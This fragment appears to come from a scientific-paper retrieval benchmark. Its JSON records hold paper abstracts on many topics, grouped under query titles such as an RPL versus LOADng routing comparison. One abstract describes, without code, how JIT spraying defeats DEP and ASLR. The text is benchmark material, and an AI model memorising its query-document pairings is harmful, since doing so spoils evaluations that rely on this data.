"text": "Spoken language interfaces are being incorporated into various devices such as smart phones and TVs. However, dialogue systems may fail to respond correctly when users' request functionality is not supported by currently installed apps. This paper proposes a feature-enriched matrix factorization (MF) approach to model open domain intents, which allows a system to dynamically add unexplored domains according to users' requests. First we leverage the structured knowledge from Wikipedia and Freebase to automatically acquire domain-related semantics to enrich features of input utterances, and then MF is applied to model automatically acquired knowledge, published app textual descriptions and users' spoken requests in a joint fashion; this generates latent feature vectors for utterances and user intents without need of prior annotations. Experiments show that the proposed MF models incorporated with rich features significantly improve intent prediction, achieving about 34% of mean average precision (MAP) for both ASR and manual transcripts.",
"title": ""
},
{
"docid": "002c7b0c2eec1bcef6efd149d241616e",
"text": "Despite all that has been done to promote Road Safety in India so far, there are always regions that fall prey to the vulnerabilities that linger on in every corner. The heterogeneity of these vulnerability-inducing causes leads to the need for an effective analysis so as to subdue the alarming figures by a significant amount. The objective of this paper is to have data mining to come to aid to create a model that not only smooths out the heterogeneity of the data by grouping similar objects together to find the accident prone areas in the country with respect to different accident-factors but also helps determine the association between these factors and casualties.",
"title": ""
},
{
"docid": "274829e884c6ba5f425efbdce7604108",
"text": "The Internet of Things (IoT) is constantly evolving and is giving unique solutions to the everyday problems faced by man. “Smart City” is one such implementation aimed at improving the lifestyle of human beings. One of the major hurdles in most cities is its solid waste management, and effective management of the solid waste produced becomes an integral part of a smart city. This paper aims at providing an IoT based architectural solution to tackle the problems faced by the present solid waste management system. By providing a complete IoT based system, the process of tracking, collecting, and managing the solid waste can be easily automated and monitored efficiently. By taking the example of the solid waste management crisis of Bengaluru city, India, we have come up with the overall system architecture and protocol stack to give a IoT based solution to improve the reliability and efficiency of the system. By making use of sensors, we collect data from the garbage bins and send them to a gateway using LoRa technology. The data from various garbage bins are collected by the gateway and sent to the cloud over the Internet using the MQTT (Message Queue Telemetry Transport) protocol. The main advantage of the proposed system is the use of LoRa technology for data communication which enables long distance data transmission along with low power consumption as compared to Wi-Fi, Bluetooth or Zigbee.",
"title": ""
},
{
"docid": "e006be5c04dfbb672eaac6cd41ead75c",
"text": "Current regulators for ac inverters are commonly categorized as hysteresis, linear PI, or deadbeat predictive regulators, with a further sub-classification into stationary ABC frame and synchronous – frame implementations. Synchronous frame regulators are generally accepted to have a better performance than stationary frame regulators, as they operate on dc quantities and hence can eliminate steady-state errors. This paper establishes a theoretical connection between these two classes of regulators and proposes a new type of stationary frame regulator, the P+Resonant regulator, which achieves the same transient and steady-state performance as a synchronous frame PI regulator. The new regulator is applicable to both single-phase and three phase inverters.",
"title": ""
},
{
"docid": "d1ff3f763fac877350d402402b29323c",
"text": "The study of microstrip patch antennas has made great progress in recent years. Compared with conventional antennas, microstrip patch antennas have more advantages and better prospects. They are lighter in weight, low volume, low cost, low profile, smaller in dimension and ease of fabrication and conformity. Moreover, the microstrip patch antennas can provide dual and circular polarizations, dual-frequency operation, frequency agility, broad band-width, feedline flexibility, beam scanning omnidirectional patterning. In this paper we discuss the microstrip antenna, types of microstrip antenna, feeding techniques and application of microstrip patch antenna with their advantage and disadvantages over conventional microwave antennas.",
"title": ""
},
{
"docid": "90b502cb72488529ec0d389ca99b57b8",
"text": "The cross-entropy loss commonly used in deep learning is closely related to the defining properties of optimal representations, but does not enforce some of the key properties. We show that this can be solved by adding a regularization term, which is in turn related to injecting multiplicative noise in the activations of a Deep Neural Network, a special case of which is the common practice of dropout. We show that our regularized loss function can be efficiently minimized using Information Dropout, a generalization of dropout rooted in information theoretic principles that automatically adapts to the data and can better exploit architectures of limited capacity. When the task is the reconstruction of the input, we show that our loss function yields a Variational Autoencoder as a special case, thus providing a link between representation learning, information theory and variational inference. Finally, we prove that we can promote the creation of optimal disentangled representations simply by enforcing a factorized prior, a fact that has been observed empirically in recent work. Our experiments validate the theoretical intuitions behind our method, and we find that Information Dropout achieves a comparable or better generalization performance than binary dropout, especially on smaller models, since it can automatically adapt the noise to the structure of the network, as well as to the test sample.",
"title": ""
},
{
"docid": "e0ffd8055600c38f59fec4f702c0a8ec",
"text": "Requirements Engineering is one of the most vital activities in the entire Software Development Life Cycle. The success of the software is largely dependent on how well the users' requirements have been understood and converted into appropriate functionalities in the software. Typically, the users convey their requirements in natural language statements that initially appear easy to state. However, being stated in natural language, the statement of requirements often tends to suffer from misinterpretations and imprecise inferences. As a result, the requirements specified thus, may lead to ambiguities in the software specifications. One can indeed find numerous approaches that deal with ensuring precise requirement specifications. Naturally, an obvious approach to deal with ambiguities in natural language software specifications is to eliminate ambiguities altogether i.e. to use formal specifications. However, the formal methods have been observed to be cost-effective largely for the development of mission-critical software. Due to the technical sophistication required, these are yet to be accepted in the mainstream. Hence, the other alternative is to let the ambiguities exist in the natural language requirements but deal with the same using proven techniques viz. using approaches based on machine learning, knowledge and ontology to resolve them. One can indeed find numerous automated and semi-automated tools to resolve specific types of natural language software requirement ambiguities. However, to the best of our knowledge there is no published literature that attempts to compare and contrast the prevalent approaches to deal with ambiguities in natural language software requirements. Hence, in this paper, we attempt to survey and analyze the prevalent approaches that attempt to resolve ambiguities in natural language software requirements. We focus on presenting a state-of-the-art survey of the currently available tools for ambiguity resolution. The objective of this paper is to disseminate, dissect and analyze the research work published in the area, identify metrics for a comparative evaluation and eventually do the same. At the end, we identify open research issues with an aim to spark new interests and developments in this field.",
"title": ""
}
] | scidocsrr |
04460e92b760064c035e507573220270 | Performance comparison of the RPL and LOADng routing protocols in a Home Automation scenario | [
{
"docid": "a231d6254a136a40625728d7e14d7844",
"text": "This document specifies an Internet standards track protocol for the Internet community, and requests discussion and suggestions for improvements. Please refer to the current edition of the \"Internet Official Protocol Standards\" (STD 1) for the standardization state and status of this protocol. Distribution of this memo is unlimited. Abstract This document describes the frame format for transmission of IPv6 packets and the method of forming IPv6 link-local addresses and statelessly autoconfigured addresses on IEEE 802.15.4 networks. Additional specifications include a simple header compression scheme using shared context and provisions for packet delivery in IEEE 802.15.4 meshes.",
"title": ""
}
] | [
{
"docid": "2377b7926cebeee93a92eb03e71e77d2",
"text": "Electronic commerce has enabled a number of online pay-for-answer services. However, despite commercial interest, we still lack a comprehensive understanding of how financial incentives support question asking and answering. Using 800 questions randomly selected from a pay-for-answer site, along with site usage statistics, we examined what factors impact askers' decisions to pay. We also explored how financial rewards affect answers, and if question pricing can help organize Q&A exchanges for archival purposes. We found that askers' decisions are two-part--whether or not to pay and how much to pay. Askers are more likely to pay when requesting facts and will pay more when questions are more difficult. On the answer side, our results support prior findings that paying more may elicit a higher number of answers and answers that are longer, but may not elicit higher quality answers (as rated by the askers). Finally, we present evidence that questions with higher rewards have higher archival value, which suggests that pricing can be used to support archival use.",
"title": ""
},
{
"docid": "02d65cf36a3216b28a88b9077ff14e2a",
"text": "Suction cups have long been used as a means to grasp and manipulate objects. They enable active control of grasp, enhance grasp stability, and handle some objects such as large flat plates more easily than standard graspers. However, the application of suction cups to object manipulation has been confined to a relatively small, well-defined problem set. Their potential for grasping a large range of unknown objects remains relatively unexplored. This seems in part due to the complexity involved with the design and fabrication of various materials comprising the grasper as well as actuators used to enable grasping. This paper introduces the design of a suction cup that is “self-selecting.” In other words, the suction cups comprising the grasper do not exert any suction force when the cup(s) are not in contact with the object, but instead exert a suction force only when they are in physical contact with the object. Since grasping is achieved purely by passive means, the cost and weight associated with individual sensors, valves, and/or actuators are essentially eliminated. Furthermore, the design permits the use of a central vacuum pump, thereby maximizing the suction force on an object and enabling some suction on surfaces that may prohibit tight seals. This paper presents the design, analysis, fabrication, and experimental results of such a “self-selecting” suction cup array.",
"title": ""
},
{
"docid": "c42b336a93025547219bac220c7e81c5",
"text": "OBJECTIVE\nThe purpose of this study was to establish outcome measures for professionalism in medical students and to identify predictors of these outcomes.\n\n\nDESIGN\nRetrospective cohort study.\n\n\nSETTING\nA US medical school.\n\n\nPARTICIPANTS\nAll students entering in 1995 and graduating within 5 years.\n\n\nMEASURES\nOutcome measures included review board identification of professionalism problems and clerkship evaluations for items pertaining to professionalism. Pre-clinical predictor variables included material from the admissions application, completion of required course evaluations, students' self-reporting of immunisation compliance, students' performance on standardised patient (SP) exercises, and students' self-assessed performance on SP exercises.\n\n\nRESULTS\nThe outcome measures of clerkship professionalism scores were found to be highly reliable (alpha 0.88-0.96). No data from the admissions material was found to be predictive of professional behaviour in the clinical years. Using multivariate regression, failing to complete required course evaluations (B = 0.23) and failing to report immunisation compliance (B = 0.29) were significant predictors of unprofessional behaviour found by the review board in subsequent years. Immunisation non-compliance predicted low overall clerkship professional evaluation scores (B = - 0.34). Student self-assessment accuracy (SP score minus self-assessed score) (B = 0.03) and immunisation non-compliance (B = 0.54) predicted the internal medicine clerkship professionalism score.\n\n\nCONCLUSIONS\nThis study identifies a set of reliable, context-bound outcome measures in professionalism. Although we searched for predictors of behaviour in the admissions application and other domains commonly felt to be predictive of professionalism, we found significant predictors only in domains where students had had opportunities to demonstrate conscientious behaviour or humility in self-assessment.",
"title": ""
},
{
"docid": "57227cc2400f478671e2877feee3f835",
"text": "Internet of Things (IoT) has been proposed to be a new paradigm of connecting devices and providing services to various applications, e.g., transportation, energy, smart cities, and health care. In this paper we focus on an important issue, i.e., the economics of IoT, that can have a great impact on the success of IoT applications. In particular, we adopt and present the information economics approach with its applications in IoT. We first review existing economic models developed for IoT services. Then we outline two important topics of information economics that are pertinent to IoT, i.e., the value of information and proper pricing of information. Finally, we propose a game theoretic model to study the price competition of IoT sensing services. Perspectives on future research directions to apply information economics to IoT are discussed.",
"title": ""
},
{
"docid": "3c3ae987e018322ca45b280c3d01eba8",
"text": "Boundary prediction in images as well as video has been a very active topic of research and organizing visual information into boundaries and segments is believed to be a corner stone of visual perception. While prior work has focused on predicting boundaries for observed frames, our work aims at predicting boundaries of future unobserved frames. This requires our model to learn about the fate of boundaries and extrapolate motion patterns. We experiment on established realworld video segmentation dataset, which provides a testbed for this new task. We show for the first time spatio-temporal boundary extrapolation in this challenging scenario. Furthermore, we show long-term prediction of boundaries in situations where the motion is governed by the laws of physics. We successfully predict boundaries in a billiard scenario without any assumptions of a strong parametric model or any object notion. We argue that our model has with minimalistic model assumptions derived a notion of “intuitive physics” that can be applied to novel scenes.",
"title": ""
},
{
"docid": "24d3e9a74e7bb6465e24e8ec2823f87e",
"text": "Software-Defined Networking (SDN) is now envisioned for Wide Area Networks (WAN) and deployed constrained networks. Such networks require a resilient, scalable and easily extensible SDN control plane. In this paper, we propose DISCO, a DIstributed SDN COntrol plane able to cope with the distributed and heterogeneous nature of modern overlay networks and deployed networks. A DISCO controller manages its own network domain, communicates with other DISCO controllers to provide end-to-end network services and share aggregated network-wide information. This east-west communication is based on a lightweight and highly manageable control channel which can self-adapt to network conditions.",
"title": ""
},
{
"docid": "cf248f6d767072a4569e31e49918dea1",
"text": "We describe resources aimed at increasing the usability of the semantic representations utilized within the DELPH-IN (Deep Linguistic Processing with HPSG) consortium. We concentrate in particular on the Dependency Minimal Recursion Semantics (DMRS) formalism, a graph-based representation designed for compositional semantic representation with deep grammars. Our main focus is on English, and specifically English Resource Semantics (ERS) as used in the English Resource Grammar. We first give an introduction to ERS and DMRS and a brief overview of some existing resources and then describe in detail a new repository which has been developed to simplify the use of ERS/DMRS. We explain a number of operations on DMRS graphs which our repository supports, with sketches of the algorithms, and illustrate how these operations can be exploited in application building. We believe that this work will aid researchers to exploit the rich and effective but complex DELPH-IN resources.",
"title": ""
},
{
"docid": "9f82843a9f3434ada3f60d09604b0afe",
"text": "The performance of pattern classifiers depends on the separability of the classes in the feature space - a property related to the quality of the descriptors - and the choice of informative training samples for user labeling - a procedure that usually requires active learning. This work is devoted to improve the quality of the descriptors when samples are superpixels from remote sensing images. We introduce a new scheme for superpixel description based on Bag of visual Words, which includes information from adjacent superpixels, and validate it by using two remote sensing images and several region descriptors as baselines.",
"title": ""
},
{
"docid": "47aee90be18e5f2b906d97c67f6016e7",
"text": "Embedded VLC (Visible Light Communication) has attracted significant research attention in recent years. A reliable and robust VLC system can become one of the IoT communication technologies for indoor environment. VLC could become a wireless technology complementary to existing RF-based technology but with no RF interference. However, existing low cost LED based VLC platforms have limited throughput and reliability. In this work, we introduce Purple VLC: a new embedded VLC platform that can achieve 100 kbps aggregate throughput at a distance of 6 meters, which is 6-7x improvement over state-of-the-art. Our design combines I/O offloading in computation, concurrent communication with polarized light, and full-duplexing to offer more than 99% link reliability at a distance of 6 meters.",
"title": ""
},
{
"docid": "7ca0ceb19e47f9848db1a5946c19d561",
"text": "This thesis performs an empirical analysis of Word2Vec by comparing its output to WordNet, a well-known, human-curated lexical database. It finds that Word2Vec tends to uncover more of certain types of semantic relations than others – with Word2Vec returning more hypernyms, synonomyns and hyponyms than hyponyms or holonyms. It also shows the probability that neighbors separated by a given cosine distance in Word2Vec are semantically related in WordNet. This result both adds to our understanding of the stillunknown Word2Vec and helps to benchmark new semantic tools built from word vectors. Word2Vec, Natural Language Processing, WordNet, Distributional Semantics",
"title": ""
},
{
"docid": "72e158d509f7f95eb0a3dcf699922be2",
"text": "We perform an asset market experiment in order to investigate whether overconfidence induces trading. We investigate three manifestations of overconfidence: calibration-based overconfidence, the better-than-average effect and illusion of control. Novelly, the measure employed for calibration-based overconfidence is task-specific in that it is designed to influence behavior. We find that calibration-based overconfidence does engender additional trade, though the better-than-average also appears to play a role. This is true both at the level of the individual and also at the level of the market. There is little evidence that gender influences trading activity. JEL Classification: G10, G11, G12, G14 The authors gratefully acknowledge the co-editor’s valuable suggestions in improving the paper’s exposition and two anonymous referrers’ valuable comments. In addition, the authors would like to thank the very helpful comments of Lucy Ackert, Ben Amoako-Adu, Bruno Biais, Tim Cason, Narat Charupat, Günter Franke, Simon Gervais, Markus Glaser, Patrik Guggenberger, Michael Haigh, Joachim Inkmann, Marhuenda Joaquin, Alexander Kempf, Brian Kluger, Roman Kraeussl, Bina Lehmann, Tao Lin, Harald Lohre, Greg Lypny, Elizabeth Maynes, Moshe Milevsky, Dean Mountain, Gordon Roberts, Chris Robinson, Stefan Rünzi, Gideon Saar, Dirk Schiereck, Harris Schlesinger, Chuck Schnitzlein, Michael Schröder, Betty Simkins, Brian Smith, Issouf Soumare, Yisong Tian, Chris Veld, Boyce Watkins, Martin Weber and Stephan Wiehler, along with seminar participants from American Finance Association 2005 (Philadelphia), the Economic Science Association 2004 (Amsterdam), the Financial Management Association 2004 (New Orleans), the Financial Management Association European Meeting 2004 (Zurich), European Financial Management Association 2004 (Basle), the Northern Finance Association (St. John’s, Newfoundland), the 2004 Symposium for Experimental Finance at the Aston Centre for Experimental Finance (Aston Business School), the 2005 Federal Reserve Bank of Atlanta Experimental Finance Conference, the University of Köln, the University of Konstanz, McMaster University, the University of Tilburg, Wilfred Laurier University and York University. Valuable technical assistance was provided by Harald Lohre, Amer Mohamed and John O’Brien. Generous financial assistance from ZEW, Institut de Finance Mathématiques de Montréal and SSHRC is gratefully acknowledged. Any views expressed represent those of the authors only and not necessarily those of McKinsey & Company, Inc. C © The Authors 2008. Published by Oxford University Press on behalf of the European Finance Association. All rights reserved. For Permissions, please email: journals.permissions@oxfordjournals.org 556 RICHARD DEAVES, ERIK LÜDERS, AND GUO YING LUO",
"title": ""
},
{
"docid": "d2cf6c5241e2169c59cfbb39bf3d09bb",
"text": "As remote exploits further dwindle and perimeter defenses become the standard, remote client-side attacks are becoming the standard vector for attackers. Modern operating systems have quelled the explosion of client-side vulnerabilities using mitigation techniques such as data execution prevention (DEP) and address space layout randomization (ASLR). This work illustrates two novel techniques to bypass these mitigations. The two techniques leverage the attack surface exposed by the script interpreters commonly accessible within the browser. The first technique, pointer inference, is used to find the memory address of a string of shellcode within the Adobe Flash Player's ActionScript interpreter despite ASLR. The second technique, JIT spraying, is used to write shellcode to executable memory, bypassing DEP protections, by leveraging predictable behaviors of the ActionScript JIT compiler. Previous attacks are examined and future research directions are discussed.",
"title": ""
},
{
"docid": "96be7a58f4aec960e2ad2273dea26adb",
"text": "Because time series are a ubiquitous and increasingly prevalent type of data, there has been much research effort devoted to time series data mining recently. As with all data mining problems, the key to effective and scalable algorithms is choosing the right representation of the data. Many high level representations of time series have been proposed for data mining. In this work, we introduce a new technique based on a bit level approximation of the data. The representation has several important advantages over existing techniques. One unique advantage is that it allows raw data to be directly compared to the reduced representation, while still guaranteeing lower bounds to Euclidean distance. This fact can be exploited to produce faster exact algorithms for similarly search. In addition, we demonstrate that our new representation allows time series clustering to scale to much larger datasets.",
"title": ""
},
{
"docid": "b6a7cf463f7d9ac28526feaa205fad52",
"text": "In this work, we present a common framework for seeded image segmentation algorithms that yields two of the leading methods as special cases - The graph cuts and the random walker algorithms. The formulation of this common framework naturally suggests a new, third, algorithm that we develop here. Specifically, the former algorithms may be shown to minimize a certain energy with respect to either an l1 or an l2 norm. Here, we explore the segmentation algorithm defined by an linfin norm, provide a method for the optimization and show that the resulting algorithm produces an accurate segmentation that demonstrates greater stability with respect to the number of seeds employed than either the graph cuts or random walker methods.",
"title": ""
},
{
"docid": "8c0d3cfffb719f757f19bbb33412d8c6",
"text": "In this paper, we present a parallel Image-to-Mesh Conversion (I2M) algorithm with quality and fidelity guarantees achieved by dynamic point insertions and removals. Starting directly from an image, it is able to recover the isosurface and mesh the volume with tetrahedra of good shape. Our tightly-coupled shared-memory parallel speculative execution paradigm employs carefully designed contention managers, load balancing, synchronization and optimizations schemes which boost the parallel efficiency with little overhead: our single-threaded performance is faster than CGAL, the state of the art sequential mesh generation software we are aware of. The effectiveness of our method is shown on Blacklight, the Pittsburgh Supercomputing Center's cache-coherent NUMA machine, via a series of case studies justifying our choices. We observe a more than 82% strong scaling efficiency for up to 64 cores, and a more than 95% weak scaling efficiency for up to 144 cores, reaching a rate of 14.7 Million Elements per second. To the best of our knowledge, this is the fastest and most scalable 3D Delaunay refinement algorithm.",
"title": ""
},
{
"docid": "592a3f8b0d0781acd89c0102d1cd2a4e",
"text": "A novel, compact X-shaped slotted square-patch antenna is proposed for circularly polarized (CP) radiation. A cross-strip is embedded along the X-shaped slot for a novel proximity-fed technique to produce CP radiation in the UHF band. In the proposed design, two pairs of T-shaped slots are etched orthogonally on the square patch, connected to the center of the X-shaped slot for CP radiation and antenna size reduction. Proper adjustment of the length and coupling gap of the cross-strip will excite two orthogonal modes with 90 ° phase difference for good CP radiation. Simulated and measured results indicate that the proposed structure can achieve circular polarization. A measured impedance bandwidth (VSWR ≤ 2) of about 3.0% (909-937 MHz) and a 3-dB axial-ratio (AR) bandwidth of about 1.3% (917-929 MHz) were obtained.",
"title": ""
},
{
"docid": "70fafdedd05a40db5af1eabdf07d431c",
"text": "Segmentation of the left ventricle (LV) from cardiac magnetic resonance imaging (MRI) datasets is an essential step for calculation of clinical indices such as ventricular volume and ejection fraction. In this work, we employ deep learning algorithms combined with deformable models to develop and evaluate a fully automatic LV segmentation tool from short-axis cardiac MRI datasets. The method employs deep learning algorithms to learn the segmentation task from the ground true data. Convolutional networks are employed to automatically detect the LV chamber in MRI dataset. Stacked autoencoders are used to infer the LV shape. The inferred shape is incorporated into deformable models to improve the accuracy and robustness of the segmentation. We validated our method using 45 cardiac MR datasets from the MICCAI 2009 LV segmentation challenge and showed that it outperforms the state-of-the art methods. Excellent agreement with the ground truth was achieved. Validation metrics, percentage of good contours, Dice metric, average perpendicular distance and conformity, were computed as 96.69%, 0.94, 1.81 mm and 0.86, versus those of 79.2-95.62%, 0.87-0.9, 1.76-2.97 mm and 0.67-0.78, obtained by other methods, respectively.",
"title": ""
},
{
"docid": "1efeab8c3036ad5ec1b4dc63a857b392",
"text": "In this paper, we present a motion planning framework for a fully deployed autonomous unmanned aerial vehicle which integrates two sample-based motion planning techniques, Probabilistic Roadmaps and Rapidly Exploring Random Trees. Additionally, we incorporate dynamic reconfigurability into the framework by integrating the motion planners with the control kernel of the UAV in a novel manner with little modification to the original algorithms. The framework has been verified through simulation and in actual flight. Empirical results show that these techniques used with such a framework offer a surprisingly efficient method for dynamically reconfiguring a motion plan based on unforeseen contingencies which may arise during the execution of a plan. The framework is generic and can be used for additional platforms.",
"title": ""
},
{
"docid": "e88bac9a4023b1c741c720e034669109",
"text": "We present AffectAura, an emotional prosthetic that allows users to reflect on their emotional states over long periods of time. We designed a multimodal sensor set-up for continuous logging of audio, visual, physiological and contextual data, a classification scheme for predicting user affective state and an interface for user reflection. The system continuously predicts a user's valence, arousal and engage-ment, and correlates this with information on events, communications and data interactions. We evaluate the interface through a user study consisting of six users and over 240 hours of data, and demonstrate the utility of such a reflection tool. We show that users could reason forward and backward in time about their emotional experiences using the interface, and found this useful.",
"title": ""
},
{
"docid": "9f3e9e7c493b3b62c7ec257a00f43c20",
"text": "The wind stroke is a common syndrome in clinical disease; the physicians of past generations accumulated much experience in long-term clinical practice and left abundant literature. Looking from this literature, the physicians of past generations had different cognitions of the wind stroke, especially the concept of wind stroke. The connotation of wind stroke differed at different stages, going through a gradually changing process from exogenous disease, true wind stroke, apoplectic wind stroke to cerebral apoplexy.",
"title": ""
}
] | scidocsrr |
939722dcb0dd8180b64ca79ccce1e112 | Energy management systems: state of the art and emerging trends | [
{
"docid": "a8d6fe9d4670d1ccc4569aa322f665ee",
"text": "Abstract Improved feedback on electricity consumption may provide a tool for customers to better control their consumption and ultimately save energy. This paper asks which kind of feedback is most successful. For this purpose, a psychological model is presented that illustrates how and why feedback works. Relevant features of feedback are identified that may determine its effectiveness: frequency, duration, content, breakdown, medium and way of presentation, comparisons, and combination with other instruments. The paper continues with an analysis of international experience in order to find empirical evidence for which kinds of feedback work best. In spite of considerable data restraints and research gaps, there is some indication that the most successful feedback combines the following features: it is given frequently and over a long time, provides an appliance-specific breakdown, is presented in a clear and appealing way, and uses computerized and interactive tools.",
"title": ""
}
] | [
{
"docid": "1d4b1612f9e3d3205ced6ba07af21467",
"text": "A precision control system that enables a center pivot irrigation system (CP) to precisely supply water in optimal rates relative to the needs of individual areas within fields was developed through a collaboration between the Farmscan group (Perth, Western Australia) and the University of Georgia Precision Farming team at the National Environmentally Sound Production Agriculture Laboratory (NESPAL) in Tifton, GA. The control system, referred to as Variable-Rate Irrigation (VRI), varies application rate by cycling sprinklers on and off and by varying the CP travel speed. Desktop PC software is used to define application maps which are loaded into the VRI controller. The VRI system uses GPS to determine pivot position/angle of the CP mainline. Results from VRI system performance testing indicate good correlation between target and actual application rates and also shows that sprinkler cycling on/off does not alter the CP uniformity. By applying irrigation water in this precise manner, water application to the field is optimized. In many cases, substantial water savings can be realized.",
"title": ""
},
{
"docid": "22d153c01c82117466777842724bbaca",
"text": "State-of-the-art photovoltaics use high-purity, large-area, wafer-scale single-crystalline semiconductors grown by sophisticated, high-temperature crystal growth processes. We demonstrate a solution-based hot-casting technique to grow continuous, pinhole-free thin films of organometallic perovskites with millimeter-scale crystalline grains. We fabricated planar solar cells with efficiencies approaching 18%, with little cell-to-cell variability. The devices show hysteresis-free photovoltaic response, which had been a fundamental bottleneck for the stable operation of perovskite devices. Characterization and modeling attribute the improved performance to reduced bulk defects and improved charge carrier mobility in large-grain devices. We anticipate that this technique will lead the field toward synthesis of wafer-scale crystalline perovskites, necessary for the fabrication of high-efficiency solar cells, and will be applicable to several other material systems plagued by polydispersity, defects, and grain boundary recombination in solution-processed thin films.",
"title": ""
},
{
"docid": "287572e1c394ec6959853f62b7707233",
"text": "This paper presents a method for state estimation on a ballbot; i.e., a robot balancing on a single sphere. Within the framework of an extended Kalman filter and by utilizing a complete kinematic model of the robot, sensory information from different sources is combined and fused to obtain accurate estimates of the robot's attitude, velocity, and position. This information is to be used for state feedback control of the dynamically unstable system. Three incremental encoders (attached to the omniwheels that drive the ball of the robot) as well as three rate gyroscopes and accelerometers (attached to the robot's main body) are used as sensors. For the presented method, observability is proven analytically for all essential states in the system, and the algorithm is experimentally evaluated on the Ballbot Rezero.",
"title": ""
},
{
"docid": "38935c773fb3163a1841fcec62b3e15a",
"text": "We investigate how neural networks can learn and process languages with hierarchical, compositional semantics. To this end, we define the artificial task of processing nested arithmetic expressions, and study whether different types of neural networks can learn to compute their meaning. We find that recursive neural networks can implement a generalising solution to this problem, and we visualise this solution by breaking it up in three steps: project, sum and squash. As a next step, we investigate recurrent neural networks, and show that a gated recurrent unit, that processes its input incrementally, also performs very well on this task: the network learns to predict the outcome of the arithmetic expressions with high accuracy, although performance deteriorates somewhat with increasing length. To develop an understanding of what the recurrent network encodes, visualisation techniques alone do not suffice. Therefore, we develop an approach where we formulate and test multiple hypotheses on the information encoded and processed by the network. For each hypothesis, we derive predictions about features of the hidden state representations at each time step, and train ‘diagnostic classifiers’ to test those predictions. Our results indicate that the networks follow a strategy similar to our hypothesised ‘cumulative strategy’, which explains the high accuracy of the network on novel expressions, the generalisation to longer expressions than seen in training, and the mild deterioration with increasing length. This is turn shows that diagnostic classifiers can be a useful technique for opening up the black box of neural networks. We argue that diagnostic classification, unlike most visualisation techniques, does scale up from small networks in a toy domain, to larger and deeper recurrent networks dealing with real-life data, and may therefore contribute to a better understanding of the internal dynamics of current state-of-the-art models in natural language processing.",
"title": ""
},
{
"docid": "1d4b1015a319612ea802c9179c73c15e",
"text": "Nowadays, recommender systems provide essential web services on the Internet. There are mainly two categories of traditional recommendation algorithms: Content-Based (CB) and Collaborative Filtering (CF). CF methods make recommendations mainly according to the historical feedback information. They usually perform better when there is sufficient feedback information but less successful on new users and items, which is called the \"cold-start'' problem. However, CB methods help in this scenario because of using content information. To take both advantages of CF and CB, how to combine them is a challenging issue. To the best of our knowledge, little previous work has been done to solve the problem in one unified recommendation model. In this work, we study how to integrate CF and CB, which utilizes both types of information in model-level but not in result-level and makes recommendations adaptively. A novel attention-based model named Attentional Content&Collaborate Model (ACCM) is proposed. Attention mechanism helps adaptively adjust for each user-item pair from which source information the recommendation is made. Especially, a \"cold sampling'' learning strategy is designed to handle the cold-start problem. Experimental results on two benchmark datasets show that the ACCM performs better on both warm and cold tests compared to the state-of-the-art algorithms.",
"title": ""
},
{
"docid": "a0e1a6a7730b1a84121a02a96faacb31",
"text": "This paper describes a mostly automatic method for taking the output of a single panning video camera and creating a panoramic video texture (PVT): a video that has been stitched into a single, wide field of view and that appears to play continuously and indefinitely. The key problem in creating a PVT is that although only a portion of the scene has been imaged at any given time, the output must simultaneously portray motion throughout the scene. Like previous work in video textures, our method employs min-cut optimization to select fragments of video that can be stitched together both spatially and temporally. However, it differs from earlier work in that the optimization must take place over a much larger set of data. Thus, to create PVTs, we introduce a dynamic programming step, followed by a novel hierarchical min-cut optimization algorithm. We also use gradient-domain compositing to further smooth boundaries between video fragments. We demonstrate our results with an interactive viewer in which users can interactively pan and zoom on high-resolution PVTs.",
"title": ""
},
{
"docid": "b9efcefffc894501f7cfc42d854d6068",
"text": "Disruption of electric power operations can be catastrophic on the national security and economy. Due to the complexity of widely dispersed assets and the interdependency between computer, communication, and power systems, the requirement to meet security and quality compliance on the operations is a challenging issue. In recent years, NERC's cybersecurity standard was initiated to require utilities compliance on cybersecurity in control systems - NERC CIP 1200. This standard identifies several cyber-related vulnerabilities that exist in control systems and recommends several remedial actions (e.g., best practices). This paper is an overview of the cybersecurity issues for electric power control and automation systems, the control architectures, and the possible methodologies for vulnerability assessment of existing systems.",
"title": ""
},
{
"docid": "8a56dfbe83fbdd45d85c6b2ac793338b",
"text": "Idioms of distress communicate suffering via reference to shared ethnopsychologies, and better understanding of idioms of distress can contribute to effective clinical and public health communication. This systematic review is a qualitative synthesis of \"thinking too much\" idioms globally, to determine their applicability and variability across cultures. We searched eight databases and retained publications if they included empirical quantitative, qualitative, or mixed-methods research regarding a \"thinking too much\" idiom and were in English. In total, 138 publications from 1979 to 2014 met inclusion criteria. We examined the descriptive epidemiology, phenomenology, etiology, and course of \"thinking too much\" idioms and compared them to psychiatric constructs. \"Thinking too much\" idioms typically reference ruminative, intrusive, and anxious thoughts and result in a range of perceived complications, physical and mental illnesses, or even death. These idioms appear to have variable overlap with common psychiatric constructs, including depression, anxiety, and PTSD. However, \"thinking too much\" idioms reflect aspects of experience, distress, and social positioning not captured by psychiatric diagnoses and often show wide within-cultural variation, in addition to between-cultural differences. Taken together, these findings suggest that \"thinking too much\" should not be interpreted as a gloss for psychiatric disorder nor assumed to be a unitary symptom or syndrome within a culture. We suggest five key ways in which engagement with \"thinking too much\" idioms can improve global mental health research and interventions: it (1) incorporates a key idiom of distress into measurement and screening to improve validity of efforts at identifying those in need of services and tracking treatment outcomes; (2) facilitates exploration of ethnopsychology in order to bolster cultural appropriateness of interventions; (3) strengthens public health communication to encourage engagement in treatment; (4) reduces stigma by enhancing understanding, promoting treatment-seeking, and avoiding unintentionally contributing to stigmatization; and (5) identifies a key locally salient treatment target.",
"title": ""
},
{
"docid": "3b2c18828ef155233ede7f51d80f656a",
"text": "It is crucial for cancer diagnosis and treatment to accurately identify the site of origin of a tumor. With the emergence and rapid advancement of DNA microarray technologies, constructing gene expression profiles for different cancer types has already become a promising means for cancer classification. In addition to research on binary classification such as normal versus tumor samples, which attracts numerous efforts from a variety of disciplines, the discrimination of multiple tumor types is also important. Meanwhile, the selection of genes which are relevant to a certain cancer type not only improves the performance of the classifiers, but also provides molecular insights for treatment and drug development. Here, we use semisupervised ellipsoid ARTMAP (ssEAM) for multiclass cancer discrimination and particle swarm optimization for informative gene selection. ssEAM is a neural network architecture rooted in adaptive resonance theory and suitable for classification tasks. ssEAM features fast, stable, and finite learning and creates hyperellipsoidal clusters, inducing complex nonlinear decision boundaries. PSO is an evolutionary algorithm-based technique for global optimization. A discrete binary version of PSO is employed to indicate whether genes are chosen or not. The effectiveness of ssEAM/PSO for multiclass cancer diagnosis is demonstrated by testing it on three publicly available multiple-class cancer data sets. ssEAM/PSO achieves competitive performance on all these data sets, with results comparable to or better than those obtained by other classifiers",
"title": ""
},
{
"docid": "03e48fbf57782a713bd218377290044c",
